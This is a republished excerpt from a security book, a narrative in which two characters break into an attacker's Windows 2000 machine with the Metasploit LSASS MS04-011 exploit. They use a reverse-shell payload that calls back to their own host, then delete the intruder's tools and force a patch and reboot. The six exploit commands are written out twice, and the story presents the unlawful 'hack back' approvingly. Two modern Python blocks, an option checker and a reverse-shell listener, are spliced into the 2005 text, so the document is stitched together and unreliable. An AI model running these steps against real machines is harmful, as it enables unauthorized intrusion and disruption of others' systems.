Nov 15 2005 12:30AM
(page 5 of 6)
Aggressive Network Self-Defense


By Neil R. Wyler
Published by Syngress
ISBN: 1931836205
Published: February 2005
Pages: 448


Figure 9 The Metasploit Framework Console

After scanning the window and making mental notes of commands he was going to need to use later, David began by typing:

msf > show exploits

Figure 10 Searching for Exploits with Metasploit Framework

"Now that's pretty," Bryan said, looking at the list of exploits displayed in front of them.

"Yeah, it really is," replied David "We're going with the LSASS exploit right?"

"Yeah, we better go grab the patch. Pull up the info on the exploit."

msf > info lsass_ms04_011

Figure 11 Metasploit Framework's Information on the LSASS Exploit

The information on the LSASS exploit appeared in the console window. It had everything they needed to know about the vulnerability and how they could exploit it. David and Bryan made note of the required options for the exploit, as well as the MS TechNet URL.

"Drop that URL into the browser; the patch should be on there," Bryan said.

"I'm one step ahead of you," David said as he opened Firefox.

David input the URL into the address bar and quickly was greeted by the security bulletin for the LSASS stack overflow.

Figure 12 The Security Bulletin for the LSASS Stack Overflow

He scanned the document and found the patch download links close to the bottom of the screen. He clicked the link for Windows 2000, and the Download button on the page that followed.

David switched back to the Metasploit console and typed the command:

msf > use lsass_ms04_011

Well, he typed part of it; the Metasploit console supports Tab completion. After a few letters and a quick stab of the Tab key, David pressed Enter. Now that he had chosen the exploit, the msf prompt changed to include its name.

Figure 13 The Name of the Chosen Exploit Listed on Metasploit Framework Console

Not every exploit works against every operating system. Obviously, launching a Windows exploit against a Linux machine was pointless, although it happened all the time. But different exploits also behaved differently depending on the version of the target OS and on which service pack was installed.

msf lsass_ms04_011 > show targets

Metasploit listed three options for targeting. David liked the fact that an automatic option was present in case the user wasn't certain of the OS running on the target, but he was almost certain he was dealing with a Windows 2000 machine, and he'd already downloaded the patch for that OS. He set the target to Windows 2000.

msf lsass_ms04_011 > set TARGET 1

Figure 14 Supported Exploit Targets Listed on Metasploit Framework Console

Now they needed a payload. Using the same logic behind the targeting of a system with a particular exploit, it also makes sense to use the proper payload for your target operating system. Metasploit takes care of this by allowing the user to see only those payloads that will function with the selected exploit.

msf lsass_ms04_011 > show payloads

Figure 15 Usable Payloads Listed on Metasploit Framework Console

David selected a Windows Reverse Shell payload. Rather than David connecting in to a port on the target, this would make the compromised machine connect back to his own (the listening host) and hand him a command shell over that connection.

msf lsass_ms04_011 > set PAYLOAD win32_reverse

Once again the prompt changed to reflect not only the chosen exploit but also the payload that would be used.

Figure 16 Details of the Chosen Exploit and Usable Payload Listed on Metasploit Framework Console

Each exploit and payload requires different options to be set for the exploit and payload to function properly.

msf lsass_ms04_011(win32_reverse) > show options

Metasploit filled in defaults for several of the fields, but it always required a value for the remote host, and the reverse payload David and Bryan had chosen also needed the listening host, the address the target would connect back to. David set these options using the following two commands:

msf lsass_ms04_011(win32_reverse) > set RHOST 172.18.6.4

msf lsass_ms04_011(win32_reverse) > set LHOST 69.256.12.214

Figure 17 Exploit and Payload Options Listed on Metasploit Framework Console
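The `show options` step above is the check a practitioner relies on before typing `exploit`: every required option set, every value sane. Note that the LHOST as printed in the excerpt, 69.256.12.214, is not a valid IPv4 address (an octet cannot exceed 255); Metasploit would reject it at `set` or at `exploit`. The following is an added example, not Metasploit's own code, modelling that option check and running it over the six commands from the excerpt. The option names are the ones the excerpt uses; the RPORT and LPORT defaults, the PAYLOAD requirement and the name of the third target are assumptions.

```python
import ipaddress

# Added example, not Metasploit code: a small model of the check msfconsole
# performs on `show options` / `exploit`, applied to the set/use lines from
# the excerpt. Defaults and the unnamed third target are assumptions.
TARGETS = {
    0: "Automatic",
    1: "Windows 2000",
    2: "Windows XP (assumed; the excerpt does not name the third target)",
}

OPTION_SPECS = {
    # name:    (required, default, kind)
    "RHOST":   (True, None, "ipv4"),     # required by the exploit, no default
    "RPORT":   (True, "139", "port"),    # assumed default
    "LHOST":   (True, None, "ipv4"),     # required by win32_reverse, no default
    "LPORT":   (True, "4321", "port"),   # assumed default
    "TARGET":  (True, "0", "target"),    # Automatic unless set
    "PAYLOAD": (True, None, "name"),     # assumed: no default payload
}


def parse_session(lines):
    """Collect `set NAME VALUE` assignments; a leading `msf ... >` prompt and
    other console commands (use, show, exploit) are ignored."""
    opts = {}
    for line in lines:
        cmd = line.split(">", 1)[-1]
        parts = cmd.split()
        if len(parts) == 3 and parts[0].lower() == "set":
            opts[parts[1].upper()] = parts[2]
    return opts


def check_value(name, value, kind):
    """Return an error string for a bad value, or None if it is acceptable."""
    if kind == "ipv4":
        try:
            ipaddress.IPv4Address(value)
        except ipaddress.AddressValueError:
            return f"{name}={value!r} is not a valid IPv4 address"
    elif kind == "port":
        if not value.isdigit() or not 1 <= int(value) <= 65535:
            return f"{name}={value!r} is not a TCP port in 1..65535"
    elif kind == "target":
        if not value.isdigit() or int(value) not in TARGETS:
            return f"{name}={value!r} is not one of the targets {sorted(TARGETS)}"
    return None


def validate(lines):
    """Errors that should stop `exploit`: unset required options and bad values."""
    opts = parse_session(lines)
    errors = []
    for name, (required, default, kind) in OPTION_SPECS.items():
        value = opts.get(name, default)
        if value is None:
            if required:
                errors.append(f"{name} is required and has no default")
            continue
        err = check_value(name, value, kind)
        if err:
            errors.append(err)
    return errors


BOOK_SESSION = [  # the six commands as printed in the excerpt
    "msf > use lsass_ms04_011",
    "msf lsass_ms04_011 > set TARGET 1",
    "msf lsass_ms04_011 > set PAYLOAD win32_reverse",
    "msf lsass_ms04_011(win32_reverse) > set RHOST 172.18.6.4",
    "msf lsass_ms04_011(win32_reverse) > set LHOST 69.256.12.214",
    "msf lsass_ms04_011(win32_reverse) > exploit",
]

if __name__ == "__main__":
    for err in validate(BOOK_SESSION) or ["all options check out"]:
        print(err)
```

Run against the excerpt's session, the only complaint is the LHOST octet; drop the `set LHOST` line instead and the check reports the missing required option, which is the failure a reverse payload produces when nobody told it where to call home.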

All that was left to do now was run the exploit.

"Ready?" asked David looking over at Bryan, who until now had sat quietly looking at the monitor with a small grin on his face.

"Ready? You mean to break the law? To risk our jobs and our livelihood because some hacker pissed you off?" Bryan asked quickly. "Yeah, I'm ready," he said nodding.

David looked at the blinking cursor. He took a deep breath, typed the last command, looked at Bryan, and pressed Enter.

msf lsass_ms04_011(win32_reverse) > exploit

In a few seconds they were greeted by the sight of a Windows command prompt, proudly displaying the operating system to be Windows 2000. This was definitely not the XP machine they had launched the attack from. They were in.

Figure 18 Windows Command Prompt Displayed on Metasploit Framework Console

They sat in silence, staring at the screen. Neither of them said a word until Bryan said what both of them were thinking.

"Sweet."

David immediately got to work, his fingers flying over the keyboard. He renamed the patch from Windows2000-KB835732-x86-ENU.EXE to simply patch.exe and uploaded it to the root directory of the compromised system. A directory listing showed nmap, geth, and something called sys32drv.

"What the hell is sys32drv.exe?" David asked.

"Five bucks says it's netcat," laughed Bryan. "Type sys32drv -h really quick."

David typed the command and watched as the netcat help file scrolled onto the screen.

"You owe me five bucks," Bryan said.

"Hah, I never agreed."

"Well, kill that and delete the other tools."

"Consider it done."

With that, David removed each of the files the attacker had uploaded to the system. He got a certain satisfaction out of knowing that this attacker was going to be very confused when he tried to connect to this machine.

With the offending files removed from the machine he moved onto the patch:

C:\> patch.exe -q -f

The -q switch installed the patch in quiet mode, with no user interaction, and once the patch was in, -f forced the machine through the reboot, closing anything that was still running.

Sure, this was mildly evil. Forcing a reboot on a remote machine could cause the user to lose work or if it was hosting a Web server, the site might go down for a bit, but David didn't see any other option. Well, there was another option: -z would install the patch without requiring an immediate restart, but every second this machine wasn't restarted, it was a potential weapon used by an attacker on innocent users' networks. Forced reboot it is.

"That's it," David said. "Now we wait."

"How long until you think it will come back up?" asked Bryan.

"Could be a minute, or it could be 10."

David and Bryan waited patiently for 15 minutes, more than enough time for the remote machine to reboot, but they wanted to be sure. David pinged the machine; it was up.

David reopened the Metasploit console. He quickly typed the commands that he had meticulously chosen only minutes before.

msf > use lsass_ms04_011

msf lsass_ms04_011 > set TARGET 1

msf lsass_ms04_011 > set PAYLOAD win32_reverse

msf lsass_ms04_011(win32_reverse) > set RHOST 172.18.6.4

msf lsass_ms04_011(win32_reverse) > set LHOST 69.256.12.214

msf lsass_ms04_011(win32_reverse) > exploit

Six commands. That's what it took to break into the machine, only six simple commands. They watched as the Reverse Handler started and the exploit began. Only this time something was different. Rather than seeing [*] Got connection to 172.18.6.4:1030 and having a shell dropped in their lap, the Reverse Handler exited.

Figure 19 Starting Reverse Handler through Metasploit Framework Console
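What David and Bryan are watching in the second run is the handler side of the reverse payload: the listener waits on LHOST for the target to connect back, and when the patched machine never does, the handler simply exits. The following is an added example, not Metasploit's handler code, that implements that listener on the loopback interface with a timeout, plays the excerpt's two runs against it (a stand-in target that connects back and sends a cmd.exe banner, then a run where nothing connects), and pulls the OS version line out of the banner the way the prompt in Figure 18 identified the box as Windows 2000. The Windows 2000 banner and the port choices are constructed for the demonstration.

```python
import socket
import threading
import time

# Added example, not Metasploit's handler: the listener side of a reverse
# shell, which is what the win32_reverse payload connects back to. The
# banner below is constructed for the demonstration.
WIN2K_BANNER = (b"Microsoft Windows 2000 [Version 5.00.2195]\r\n"
                b"(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\n"
                b"C:\\WINNT\\system32>")


def open_listener(lhost, lport):
    """Bind LHOST:LPORT (port 0 lets the OS pick a free port) and start listening."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)
    return srv


def wait_for_callback(srv, timeout):
    """Wait for the payload to connect back. Returns (peer, bytes received),
    or None when nothing connects within `timeout`: the handler exiting,
    as it does in the excerpt's second run."""
    srv.settimeout(timeout)
    try:
        conn, peer = srv.accept()
    except socket.timeout:
        return None
    finally:
        srv.close()
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:  # read until the far end closes
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return peer, b"".join(chunks)


def os_from_banner(banner):
    """Pull the version line out of a cmd.exe banner, the line that told
    David and Bryan they were looking at Windows 2000 and not their own XP box."""
    for line in banner.decode("latin-1").splitlines():
        if line.startswith("Microsoft Windows"):
            return line.strip()
    return None


def simulated_callback(lhost, lport, banner=WIN2K_BANNER, delay=0.1):
    """Stand-in for the shell on the target connecting back to LHOST:LPORT."""
    def run():
        time.sleep(delay)
        with socket.create_connection((lhost, lport), timeout=5) as c:
            c.sendall(banner)
    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t


def first_run():
    """Before the patch: the target connects back and hands over a shell."""
    srv = open_listener("127.0.0.1", 0)
    simulated_callback("127.0.0.1", srv.getsockname()[1])
    return wait_for_callback(srv, timeout=5.0)


def second_run():
    """After the patch: the exploit does nothing, so the handler times out."""
    srv = open_listener("127.0.0.1", 0)
    return wait_for_callback(srv, timeout=0.5)


if __name__ == "__main__":
    got = first_run()
    print("first run:", os_from_banner(got[1]) if got else "handler exited")
    print("second run:", "shell" if second_run() else "handler exited, no connection")
```

A handler that exits on timeout is the right default: a listener left open indefinitely on a public LHOST is itself an open door, and the silence after the patch is only meaningful if the handler reports it rather than hanging.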

"It worked," Bryan said with a grin.

"Did you ever doubt it?" David asked.

"Yeah! I mean no! Hell, I don't know what I mean, but that's cool."

"Very."


Excerpt continued on Page 6 

About the author
Neil R. Wyler (aka Grifter) is an Information Security Engineer and Researcher currently located on the Wasatch Front in Utah. He is a staff member of the Black Hat Security Briefings, Def Con hacker conference, ApacheCon, and Gnomedex. He has spoken at numerous security conferences and been the subject of various online, print, film, and television interviews regarding different areas of information security. He is highly involved in the hacker community and helps organize and support many of the local hacker meetings, including DC801 and 2600SLC. He also serves on the advisory board for a local technical college. Neil was born and raised on Long Island, NY, before entering military service with the U.S. Air Force. He is currently the co-owner of a Utah-based consulting firm with clients worldwide. His Web site can be found at http://rootcompromise.org. Many thanks go to my beautiful wife, for putting up with me not only during the production of this book but also for the last seven years. To my family, who didn't know I was writing this book until they held it in their hands. And to my friends, for their insight and continued patience with me. To my coauthors and everyone at Syngress for making this book happen. Thanks also to Jeff and Ping Moss for the Black Hat Briefings, Def Con, and their continued friendship; the zZq guys, 2600SLC, DC801, and all the Utah hackers. I also want to thank my many friends from Def Con, Russ Rogers and securitytribe, Barkode and Ninja Networks, Freaky and Irvine Underground, Caezar and the Ghetto Hackers, Pyr0 and the 303, and everyone from the Def Con Forums. And last but certainly not least, to all the hackers of the world, whether White Hat, Black Hat, or Gray Hat; you keep life interesting, and always fun.
Copyright 2005, SecurityFocus